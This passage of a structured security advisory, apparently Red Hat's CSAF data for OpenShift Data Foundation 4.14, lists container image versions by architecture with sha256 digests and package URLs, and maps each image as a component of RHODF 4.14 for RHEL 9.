name: "odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le", product_id: "odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le", product: { name: "odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le", product_id: "odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-operator-bundle&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le", product: { name: "odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le", product_id: "odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-rhel9-operator&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le", product: { name: "odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le", product_id: "odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le", product_identification_helper: { purl: "pkg:oci/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45?arch=ppc64le&repository_url=registry.redhat.io/odf4/odr-cluster-operator-bundle&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le", product: { name: "odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le", product_id: "odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le", product_identification_helper: { purl: "pkg:oci/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf?arch=ppc64le&repository_url=registry.redhat.io/odf4/odr-hub-operator-bundle&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le", product: { name: "odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le", product_id: "odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le", product_identification_helper: { purl: "pkg:oci/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71?arch=ppc64le&repository_url=registry.redhat.io/odf4/odr-rhel9-operator&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le", product: { name: "odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le", product_id: "odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le", product_identification_helper: { purl: "pkg:oci/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b?arch=ppc64le&repository_url=registry.redhat.io/odf4/rook-ceph-rhel9-operator&tag=v4.14.13-3", }, }, }, ], category: "architecture", name: "ppc64le", }, { branches: [ { category: "product_version", name: "odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64", product: { name: "odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64", product_id: "odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64", product_identification_helper: { purl: "pkg:oci/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26?arch=arm64&repository_url=registry.redhat.io/odf4/mcg-cli-rhel9&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64", product: { name: "odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64", product_id: "odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64", product_identification_helper: { purl: "pkg:oci/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5?arch=arm64&repository_url=registry.redhat.io/odf4/mcg-core-rhel9&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64", product: { name: "odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64", product_id: "odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64", product_identification_helper: { purl: "pkg:oci/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434?arch=arm64&repository_url=registry.redhat.io/odf4/mcg-rhel9-operator&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64", product: { name: "odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64", product_id: "odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64", product_identification_helper: { purl: "pkg:oci/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0?arch=arm64&repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64", product: { name: "odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64", product_id: "odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64", product_identification_helper: { purl: "pkg:oci/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2?arch=arm64&repository_url=registry.redhat.io/odf4/ocs-rhel9-operator&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64", product: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64", product_id: "odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a?arch=arm64&repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64", product: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64", product_id: "odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281?arch=arm64&repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64", product: { name: "odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64", product_id: "odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64", product_identification_helper: { purl: "pkg:oci/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b?arch=arm64&repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64", product: { name: "odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64", product_id: "odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64", product_identification_helper: { purl: "pkg:oci/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29?arch=arm64&repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64", product: { name: "odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64", product_id: "odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64", product_identification_helper: { purl: "pkg:oci/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c?arch=arm64&repository_url=registry.redhat.io/odf4/odf-rhel9-operator&tag=v4.14.13-3", }, }, }, { category: "product_version", name: "odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64", product: { name: "odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64", product_id: "odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64", product_identification_helper: { purl: "pkg:oci/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62?arch=arm64&repository_url=registry.redhat.io/odf4/odr-rhel9-operator&tag=v4.14.13-3", }, }, }, ], category: "architecture", name: "arm64", }, ], category: "vendor", name: "Red Hat", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x", }, product_reference: "odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64 as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64", }, product_reference: "odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le", }, product_reference: "odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64 as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64", }, product_reference: "odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x", }, product_reference: "odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le", }, product_reference: "odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64 as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64", }, product_reference: "odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64 as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64", }, product_reference: "odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64 as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64", }, product_reference: "odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le", }, product_reference: "odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x", }, product_reference: "odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le", }, product_reference: "odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x", }, product_reference: "odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64 as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64", }, product_reference: "odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x", }, product_reference: "odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le", }, product_reference: "odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64 as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64", }, product_reference: "odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64 as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64", }, product_reference: "odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le", }, product_reference: "odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64 as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64", }, product_reference: "odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x", }, product_reference: "odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64 as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64", }, product_reference: "odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le", }, product_reference: "odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x", }, product_reference: "odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le", }, product_reference: "odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64 as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64", }, product_reference: "odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64 as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64", }, product_reference: "odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x", }, product_reference: "odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x", }, product_reference: 